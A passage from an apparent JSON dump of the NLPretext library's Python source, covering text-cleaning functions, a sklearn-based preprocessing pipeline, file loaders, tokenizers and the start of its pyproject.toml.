``replace_with`` str.\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the URL to be replaced with.\n\n  
  Returns\n    -------\n    string\n    \"\"\"\n    text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))\n    return text\n\n\ndef replace_emails(text: str, replace_with: str = \"*EMAIL*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all emails in ``text`` str with ``replace_with`` str\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the email address to be replaced with.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.EMAIL_REGEX.sub(replace_with, text)\n    return text\n\n\ndef replace_phone_numbers(\n    text: str,\n    country_to_detect: List[Optional[str]],\n    replace_with: str = \"*PHONE*\",\n    method: str = \"regex\",\n) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Inspired code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all phone numbers in ``text`` str with ``replace_with`` str\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the phone number to be replaced with.\n    method : ['regex','detection']\n        regex is faster but will omit a lot of numbers, while detection will\n        catch every number, but takes a while.\n    country_to_detect : list\n        If a list of country code is specified, will catch every number\n        formatted.\n        Only when method = 'detection'.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if method == \"regex\":\n        text = constants.PHONE_REGEX.sub(replace_with, text)\n    elif method == \"detection\":\n        found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)\n\n        # order by length to avoid truncated numbers being removed first.\n        found_nums.sort(key=len, reverse=True)\n        for phone_number in 
found_nums:\n            text = text.replace(phone_number, replace_with)\n    else:\n        raise ValueError(\n            'Please input a valid method between \"regex\" or \\\n            \"detection\"'\n        )\n    return text\n\n\ndef replace_numbers(text: str, replace_with: str = \"*NUMBER*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all numbers in ``text`` str with ``replace_with`` str.\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the number to be replaced with.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.NUMBERS_REGEX.sub(replace_with, text)\n    return text\n\n\ndef replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all currency symbols in ``text`` str with string specified by\n    ``replace_with`` str.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n    replace_with : None or string\n        if None (default), replace symbols with\n            their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'\n            with 'GBP'); otherwise, pass in a string with which to replace all\n            symbols (e.g. 
\"*CURRENCY*\")\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if replace_with is None:\n        for k, v in constants.CURRENCIES.items():\n            text = text.replace(k, v)\n    else:\n        text = constants.CURRENCY_REGEX.sub(replace_with, text)\n    return text\n\n\ndef remove_punct(text: str, marks: Optional[str] = None) -> str:\n    \"\"\"\n    Remove punctuation from ``text`` by replacing all instances of ``marks``\n    with whitespace.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n\n    marks : str or None\n        If specified, remove only the characters in this string,\n        e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.\n        Otherwise, all punctuation marks are removed.\n\n    Returns\n    -------\n    string\n\n    Note\n    -------\n    When ``marks=None``, Python's built-in :meth:`str.translate()` is\n    used to remove punctuation; otherwise, a regular expression is used\n    instead. The former's performance is about 5-10x faster.\n    \"\"\"\n    if marks:\n        text = re.sub(f\"[{re.escape(marks)}]+\", \" \", text, flags=re.UNICODE)\n    else:\n        text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)\n    return text\n\n\ndef remove_accents(text: str, method: str = \"unicode\") -> str:\n    \"\"\"\n    Remove accents from any accented unicode characters in ``text`` str,\n    either by transforming them into ascii equivalents or removing them\n    entirely.\n\n    Parameters\n    ----------\n    text : str\n        raw text\n\n    method : ({'unicode', 'ascii'})\n        if 'unicode', remove accented\n        char for any unicode symbol with a direct ASCII equivalent; if 'ascii',\n        remove accented char for any unicode symbol\n\n        NB: the 'ascii' method is notably faster than 'unicode', but less good\n\n    Returns\n    -------\n    string\n\n    Raises\n    ------\n    ValueError\n        if ``method`` is not in {'unicode', 'ascii'}\n    \"\"\"\n    if method == 
\"unicode\":\n        text = \"\".join(\n            c for c in unicodedata.normalize(\"NFKD\", text) if not unicodedata.combining(c)\n        )\n    elif method == \"ascii\":\n        text = unicodedata.normalize(\"NFKD\", text).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\")\n    else:\n        msg = f'`method` must be either \"unicode\" and \"ascii\", not {method}'\n        raise ValueError(msg)\n    return text\n\n\ndef remove_multiple_spaces_and_strip_text(text: str) -> str:\n    \"\"\"\n    Remove multiple spaces, strip text, and remove '-', '*' characters.\n\n    Parameters\n    ----------\n    text : str\n        the text to be processed\n\n    Returns\n    -------\n    string\n        the text with removed multiple spaces and strip text\n    \"\"\"\n    regex_remove_multiple_spaces_list = [\"\\\\t\", \"[\\\\s\\\\-\\\\*]{2,}\"]\n    for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:\n        text = re.sub(regex_remove_multiple_spaces, \" \", text)\n        text = text.strip()\n    return text\n\n\ndef filter_non_latin_characters(text: str) -> str:\n    \"\"\"\n    Function that filters non latin characters of a text.\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.LATIN_CHARACTERS_RE.sub(\" \", text)\n    text = normalize_whitespace(text)\n    return text\n"
  },
  {
    "path": "nlpretext/cli/__init__.py",
    "content": ""
  },
  {
    "path": "nlpretext/cli/__main__.py",
    "content": "# mypy: disable-error-code=\"attr-defined\"\n\nimport typer\nfrom nlpretext import __version__\nfrom nlpretext.cli import preprocess\nfrom rich.console import Console\n\napp = typer.Typer(\n    name=\"nlpretext\",\n    help=\"All the goto functions you need to handle NLP use-cases, integrated in NLPretext\",\n    add_completion=True,\n)\napp.add_typer(preprocess.app, name=\"preprocess\")\nconsole = Console()\n\n\ndef version_callback(value: bool) -> None:\n    \"\"\"Prints the version of the package.\"\"\"\n    if value:\n        console.print(f\"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]\")\n        raise typer.Exit()\n"
  },
  {
    "path": "nlpretext/cli/preprocess.py",
    "content": "from typing import List\n\nimport typer\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.textloader import TextLoader\nfrom rich.console import Console\n\napp = typer.Typer()\nconsole = Console()\n\n\n@app.command()\ndef run(\n    input: List[str] = typer.Option(  # noqa: B008\n        [],\n        \"-i\",\n        \"--input\",\n        case_sensitive=False,\n        help=\"List of files that will be preprocessed\",\n    ),\n    output: str = typer.Option(\n        None,\n        \"-o\",\n        \"--output\",\n        case_sensitive=False,\n        help=\"File that will store the result of the preprocessing\",\n    ),\n) -> None:\n    \"\"\"Runs NLPretext on a list of files and outputs the result in parquet format\n    or shows the result if no output is provided.\n\n    Args:\n\n        input: List of files that will be preprocessed\n\n        output: File that will store the result of the preprocessing\n    \"\"\"\n    text_loader = TextLoader()\n    preprocessor = Preprocessor()\n    preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)\n    if output:\n        preprocessed_text_dataframe.to_parquet(output)\n    else:\n        console.print(preprocessed_text_dataframe)\n"
  },
  {
    "path": "nlpretext/preprocessor.py",
    "content": "from typing import Any, Callable, Dict, List, Optional\n\nfrom nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters\nfrom nlpretext.social.preprocess import (\n    remove_emoji,\n    remove_hashtag,\n    remove_html_tags,\n    remove_mentions,\n)\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import FunctionTransformer\n\n\nclass Preprocessor:\n    def __init__(self):\n        \"\"\"Initialize preprocessor object to apply all text transformation.\"\"\"\n        self.__operations = []\n        self.pipeline = None\n\n    def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:\n        \"\"\"\n        Add an operation and its arguments to pipe in the preprocessor.\n\n        Parameters\n        ----------\n        operation : callable\n            text preprocessing function\n        args : dict of arguments\n        \"\"\"\n        self.__operations.append({\"operation\": operation, \"args\": args})\n\n    @staticmethod\n    def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:\n        \"\"\"\n        Build sklearn pipeline from a operation list.\n\n        Parameters\n        ----------\n        operation_list : iterable\n            list of __operations of preprocessing\n\n        Returns\n        -------\n        sklearn.pipeline.Pipeline\n        \"\"\"\n        return Pipeline(\n            steps=[\n                (\n                    operation[\"operation\"].__name__,\n                    FunctionTransformer(operation[\"operation\"], kw_args=operation[\"args\"]),\n                )\n                for operation in operation_list\n            ]\n        )\n\n    def run(self, text: str) -> str:\n        \"\"\"\n        Apply pipeline to text.\n\n        Parameters\n        ----------\n        text : string\n            text to preprocess\n\n        Returns\n        -------\n        string\n        \"\"\"\n        operations 
= self.__operations\n        if operations == []:\n            operations_to_pipe = (\n                remove_html_tags,\n                remove_mentions,\n                remove_emoji,\n                remove_hashtag,\n                remove_eol_characters,\n                fix_bad_unicode,\n                normalize_whitespace,\n            )\n            operations = [\n                {\"operation\": operation, \"args\": None} for operation in operations_to_pipe\n            ]\n        self.pipeline = self.build_pipeline(operations)\n        text = self.pipeline.transform(text)\n        return text\n"
  },
  {
    "path": "nlpretext/py.typed",
    "content": ""
  },
  {
    "path": "nlpretext/social/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/social/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Tuple\n\nimport emoji as _emoji\nfrom nlpretext._config import constants\nfrom nlpretext.basic.preprocess import normalize_whitespace\n\n\ndef remove_mentions(text: str) -> str:\n    \"\"\"\n    Function that removes words preceded with a '@'.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = normalize_whitespace(constants.AT_PATTERN.sub(\"\", text))\n    return text\n\n\ndef extract_mentions(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts words preceded with a '@'\n    eg. 
\"I take care of my skin with @thisproduct\" --> [\"@thisproduct\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return constants.AT_PATTERN.findall(text)\n\n\ndef remove_html_tags(text: str) -> str:\n    \"\"\"\n    Function that removes words between < and >.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub(\"\", text))\n    return text\n\n\ndef remove_emoji(text: str) -> str:\n    \"\"\"\n    Remove emoji from any str by stripping any unicode in the range of Emoji unicode\n    as defined in the unicode convention:\n    http://www.unicode.org/emoji/charts/full-emoji-list.html.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n    \"\"\"\n    text = _emoji.replace_emoji(text, \"\")\n    return text\n\n\n# TODO: replace mutable default value :\n#  https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html\ndef convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (\":\", \":\")) -> str:\n    \"\"\"\n    Convert emoji to their CLDR Short Name, according to the unicode convention\n    http://www.unicode.org/emoji/charts/full-emoji-list.html\n    eg. 😀 --> :grinning_face:\n\n    Parameters\n    ----------\n    text : str\n    code_delimiters : tuple of symbols around the emoji code.\n    eg: (':',':') --> :grinning_face:\n\n    Returns\n    -------\n    str\n        string\n    \"\"\"\n    return _emoji.demojize(text, delimiters=code_delimiters)\n\n\ndef extract_emojis(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts emojis from a text and translates them into words\n    eg. 
\"I take care of my skin 😀 :(\" --> [\":grinning_face:\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    list\n        list of all emojis converted with their unicode conventions\n    \"\"\"\n    emojis_in_text = _emoji.emoji_list(text)\n    emojis_converted = [\n        convert_emoji_to_text(emoji_text.get(\"emoji\", \"\")) for emoji_text in emojis_in_text\n    ]\n    return emojis_converted\n\n\ndef extract_hashtags(text: str) -> List[str]:\n    \"\"\"\n    Function that extracts words preceded with a '#'\n    eg. \"I take care of my skin #selfcare#selfestim\" --> [\"skincare\", \"selfestim\"].\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    list\n        list of all hashtags\n    \"\"\"\n    return constants.HASHTAG_PATTERN.findall(text)\n\n\ndef remove_hashtag(text: str) -> str:\n    \"\"\"\n    Function that removes words preceded with a '#'\n    eg. \"I take care of my skin #selfcare#selfestim\" --> \"I take care of my skin\".\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n        text of a post without hashtags\n    \"\"\"\n    text = normalize_whitespace(constants.HASHTAG_PATTERN.sub(\"\", text))\n    return text\n"
  },
  {
    "path": "nlpretext/textloader.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\nfrom types import ModuleType\nfrom typing import Any, List, Optional, Union\n\nimport sys\nimport warnings\n\nimport pandas as pd\n\ntry:\n    from nlpretext._utils import daskloader\nexcept ImportError:\n    warnings.warn(\n        \"Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]\",  # noqa: E501\n        stacklevel=2,\n    )\n\nfrom nlpretext._utils import pandasloader\nfrom nlpretext._utils.file_loader import check_text_file_format\nfrom nlpretext.preprocessor import Preprocessor\n\n\nclass TextLoader:\n    def __init__(self, text_column=\"text\", encoding=\"utf-8\", file_format=None, use_dask=True):\n        \"\"\"\n        Initialize DataLoader object to retrieve text data.\n\n        Parameters\n        ----------\n        text_column: string\n            name of the column containing texts in json / csv / parquet files\n        encoding: string\n            encoding of the text to be loaded, can be utf-8 or latin-1 for example\n        file_format: string | None\n            format of the files to be loaded\n        use_dask: bool\n            use dask to load text\n        \"\"\"\n        self.text_column = text_column\n        self.encoding = encoding\n        self.file_format = file_format\n\n        self.use_dask = use_dask\n\n        self.loader: ModuleType\n        if 
self.use_dask:\n            if \"dask\" in sys.modules:\n                self.loader = daskloader\n            else:\n                warnings.warn(\n                    \"Dask is not intalled, switching to pandas. Run pip install dask to use dask\",\n                    stacklevel=2,\n                )\n                self.use_dask = False\n                self.loader = pandasloader\n        else:\n            self.loader = pandasloader\n\n    def __repr__(self):\n        \"\"\"Method to represent class attributes.\"\"\"\n        class_repr_dict = {\n            \"text_column\": self.text_column,\n            \"encoding\": self.encoding,\n            \"file_format\": self.file_format,\n            \"use_dask\": self.use_dask,\n        }\n        return f\"TextLoader({class_repr_dict})\"\n\n    def _read_text_txt(self, files_path):\n        \"\"\"\n        Read txt text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_text(files_path, encoding=self.encoding)\n        text_ddf.columns = [self.text_column]\n        return text_ddf\n\n    def _read_text_json(self, files_path):\n        \"\"\"\n        Read json text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_json(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def _read_text_csv(self, files_path):\n        \"\"\"\n        Read csv text files stored in 
files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def _read_text_parquet(self, files_path):\n        \"\"\"\n        Read parquet text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path : string | list[string]\n            single or multiple files path\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)\n        try:\n            return text_ddf[[self.text_column]]\n        except KeyError as e:\n            raise KeyError(f\"Specified text_column '{self.text_column}' not in file keys\") from e\n\n    def read_text(\n        self,\n        files_path: Union[str, List[str]],\n        file_format: Optional[str] = None,\n        encoding: Optional[str] = None,\n        compute_to_pandas: bool = True,\n        preprocessor: Optional[Preprocessor] = None,\n    ) -> Union[pd.DataFrame, Any]:\n        \"\"\"\n        Read the text files stored in files_path.\n\n        Parameters\n        ----------\n        files_path: string | list[string]\n            single or multiple files path\n        file_format: string\n            Format of the files to be loaded, to be selected among csv, json, parquet or txt\n        encoding:\n            encoding of the text to be loaded, can be utf-8 or latin-1 for example\n        compute_to_pandas: bool\n            True if user wants Dask Dataframe to be computed as pandas DF, False otherwise\n        preprocessor: 
nlpretext.preprocessor.Preprocessor\n            NLPretext preprocessor can be specified to pre-process text after loading\n\n        Returns\n        -------\n        dask.dataframe | pandas.DataFrame\n        \"\"\"\n        if encoding is not None:\n            self.encoding = encoding\n\n        if file_format is not None:\n            self.file_format = file_format\n        else:\n            self.file_format = check_text_file_format(files_path)\n\n        reader_mapping = {\n            \"csv\": self._read_text_csv,\n            \"txt\": self._read_text_txt,\n            \"json\": self._read_text_json,\n            \"parquet\": self._read_text_parquet,\n        }\n        reader = reader_mapping.get(self.file_format)\n        if reader is None:\n            raise ValueError(\"Format not handled\")\n        text = reader(files_path)\n\n        if preprocessor is not None:\n            if isinstance(preprocessor, Preprocessor):\n                print(f\"before: {text.head()}\")\n                text[self.text_column] = text[self.text_column].apply(preprocessor.run)\n                print(f\"after: {text.head()}\")\n            else:\n                raise ValueError(\"Only NLPretext preprocessors can be specified\")\n\n        if compute_to_pandas and self.use_dask:\n            return text.compute()\n        return text\n"
  },
  {
    "path": "nlpretext/token/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/token/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Optional\n\nimport re\n\nfrom nlpretext._utils.stopwords import get_stopwords\n\n\ndef remove_stopwords(\n    tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None\n) -> List[str]:\n    \"\"\"\n    Remove stopwords from a text.\n    eg. 'I like when you move your body !' -> 'I move body !'.\n\n    Parameters\n    ----------\n    tokens: list(str)\n        list of tokens\n    lang: str\n        language iso code (e.g : \"en\")\n    custom_stopwords : list(str)|None\n        list of custom stopwords to add. 
None by default\n\n    Returns\n    -------\n    list\n        tokens without stopwords\n\n    Raises\n    ------\n    ValueError\n        When inputs is not a list\n    \"\"\"\n    stopwords = get_stopwords(lang)\n    if custom_stopwords:\n        stopwords += custom_stopwords\n    tokens = [word for word in tokens if word not in stopwords]\n    return tokens\n\n\ndef remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:\n    \"\"\"\n    Inputs a list of tokens, outputs a list of tokens without tokens that\n    includes numbers of special caracters.\n    ['foo','bar','124','34euros'] -> ['foo','bar'].\n\n    Parameters\n    ----------\n    tokens : list\n        list of tokens to be cleaned\n\n    Returns\n    -------\n    list\n        list of tokens without tokens with numbers\n    \"\"\"\n    tokens = [word for word in tokens if re.search(\"[^a-zA-Z]\", word) is None]\n    return tokens\n\n\ndef remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:\n    \"\"\"\n    Remove tokens that doesn't contains any number or letter.\n    eg. 
['foo','bar','---',\"'s\",'#'] -> ['foo','bar',\"'s\"].\n\n    Parameters\n    ----------\n    tokens : list\n        list of tokens to be cleaned\n\n    Returns\n    -------\n    list\n        list of tokens without tokens that contains only special caracters\n\n    \"\"\"\n    tokens = [word for word in tokens if re.search(\"[a-zA-Z0-9]\", word)]\n    return tokens\n\n\ndef remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:\n    \"\"\"\n    Function that removes words which length is below a threshold\n    [\"hello\", \"my\", \"name\", \"is\", \"John\", \"Doe\"] --> [\"hello\",\"name\",\"John\",\"Doe\"].\n\n    Parameters\n    ----------\n    text : list\n        list of strings\n    smallwords_threshold: int\n        threshold of small word\n\n    Returns\n    -------\n    list\n    \"\"\"\n    tokens = [word for word in tokens if len(word) > smallwords_threshold]\n    return tokens\n"
  },
  {
    "path": "nlpretext/token/tokenizer.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"assignment\"\n\nfrom typing import Any, List, Optional, Union\n\nimport os\nimport re\n\nimport nltk\nimport spacy\nfrom sacremoses import MosesDetokenizer, MosesTokenizer\n\nMODEL_REGEX = re.compile(r\"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$\")\nSUPPORTED_LANG_MODULES = {\"en_spacy\", \"en_nltk\", \"fr_spacy\", \"fr_moses\", \"ko_spacy\", \"ja_spacy\"}\n\n\nclass LanguageNotHandled(Exception):\n    pass\n\n\nclass LanguageNotInstalledError(Exception):\n    pass\n\n\nclass SpacyModel:\n    class SingletonSpacyModel:\n        def __init__(self, lang: str) -> None:\n            self.lang = lang\n            if lang == \"en\":\n                self.model = _load_spacy_model(\"en_core_web_sm\")\n            elif lang == \"fr\":\n                self.model = _load_spacy_model(\"fr_core_news_sm\")\n            elif lang == \"ko\":\n                self.model = spacy.blank(\"ko\")\n            elif lang == \"ja\":\n                self.model = spacy.blank(\"ja\")\n            else:\n                raise (LanguageNotHandled(\"This spacy model is not 
available\"))\n\n    model: Optional[spacy.language.Language] = None\n\n    def __init__(self, lang):\n        if not SpacyModel.model:\n            SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model\n\n    def get_lang_model(self) -> Optional[str]:  # noqa: D102\n        if self.model:\n            lang: str = self.model.lang\n            return lang\n        return None\n\n\ndef _load_spacy_model(model: str) -> Any:\n    try:\n        return spacy.load(model)\n    except OSError as e:\n        if MODEL_REGEX.match(model):\n            os.system(f\"python -m spacy download {model}\")  # nosec\n            return spacy.load(model)\n        else:\n            raise LanguageNotInstalledError(\n                f\"Model {model} is not installed. \"\n                f\"To install, run: python -m spacy download {model}\"\n            ) from e\n\n\ndef _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:\n    \"\"\"\n    Function that gets the right tokenizer given the language.\n\n    Parameters\n    ----------\n    lang : str\n        Language in which text is written. Languages handled : [\"en\", \"fr\", \"ko\", \"ja\"]\n\n    Returns\n    -------\n    spacy.tokenizer.Tokenizer\n        spacy tokenizer\n    \"\"\"\n    model = SpacyModel(lang).model\n    if model:\n        return model.tokenizer\n    return None\n\n\ndef tokenize(text: str, lang_module: str = \"en_spacy\") -> List[str]:\n    \"\"\"\n    Convert text to a list of tokens.\n\n    Parameters\n    ----------\n    lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}\n        choose the tokenization module according to the langage and the implementation.\n        Recommanded: Spacy (faster, better results). 
To process other langages\n        import models.Spacy_models\n\n    Returns\n    -------\n    list\n        list of string\n\n    Raises\n    ------\n    ValueError\n        If lang_module is not a valid module name\n    \"\"\"\n    if lang_module not in SUPPORTED_LANG_MODULES:\n        raise ValueError(\n            f\"Invalid lang_module: {lang_module}. \"\n            f\"lang_module must be one of {SUPPORTED_LANG_MODULES}.\"\n        )\n\n    tokenized_words: List[str] = []\n    if \"spacy\" in lang_module:\n        lang = lang_module.split(\"_\")[0]\n        spacymodel = _get_spacy_tokenizer(lang)\n        if spacymodel:\n            spacydoc = spacymodel(text)\n            tokenized_words = [spacy_token.text for spacy_token in spacydoc]\n    if lang_module == \"en_nltk\":\n        tokenized_words = nltk.word_tokenize(text)\n    if lang_module == \"fr_moses\":\n        tokenized_words = MosesTokenizer(lang=\"fr\").tokenize(text, escape=False)\n\n    return tokenized_words\n\n\ndef untokenize(tokens: List[str], lang: str = \"fr\") -> str:\n    \"\"\"\n    Inputs a list of tokens output string.\n    [\"J'\", 'ai'] >>> \"J' ai\".\n\n    Parameters\n    ----------\n    lang : string\n        language code\n\n    Returns\n    -------\n    string\n        text\n    \"\"\"\n    d = MosesDetokenizer(lang=lang)\n    text: str = d.detokenize(tokens, unescape=False)\n    return text\n\n\ndef convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str:  # noqa: D103\n    if isinstance(tokens_or_str, str):\n        return tokens_or_str\n    if isinstance(tokens_or_str, list):\n        return untokenize(tokens_or_str)\n    if tokens_or_str is None:\n        return \"\"\n    raise TypeError(\"Please input string or tokens\")\n\n\ndef convert_string_to_tokens(  # noqa: D103\n    tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = \"en_spacy\"\n) -> List[str]:\n    if isinstance(tokens_or_str, str):\n        return tokenize(tokens_or_str, 
lang_module=lang_module)\n    if isinstance(tokens_or_str, list):\n        return tokens_or_str\n    if tokens_or_str is None:\n        return []\n    raise TypeError(\"Please input string or tokens\")\n"
  },
  {
    "path": "pyproject.toml",
    "content": "# Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/\n\n[build-system]\nrequires = [\"poetry_core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\n[tool.poetry]\nname = \"nlpretext\"\nversion = \"1.2.2\"\ndescription = \"All the goto functions you need to handle NLP use-cases, integrated in NLPretext\"\nreadme = \"README.md\"\nauthors = [\n  \"artefactory <rafaelle.aygalenq@artefact.com>\"\n]\nlicense = \"Apache Software License 2.0\"\nrepository = \"https://github.com/artefactory/NLPretext\"\nhomepage = \"https://github.com/artefactory/NLPretext\"\n\n# Keywords description https://python-poetry.org/docs/pyproject/#keywords\nkeywords = []  # Update me\n\n# Pypi classifiers: https://pypi.org/classifiers/\nclassifiers = [  # Update me\n  \"Development Status :: 3 - Alpha\",\n  \"Intended Audience :: Developers\",\n  \"Operating System :: OS Independent\",\n  \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n\n[tool.poetry.scripts]\n# Entry points for the package https://python-poetry.org/docs/pyproject/#scripts\n\"nlpretext\" = \"nlpretext.cli.__main__:app\"\n\n[tool.poetry.dependencies]\npython = 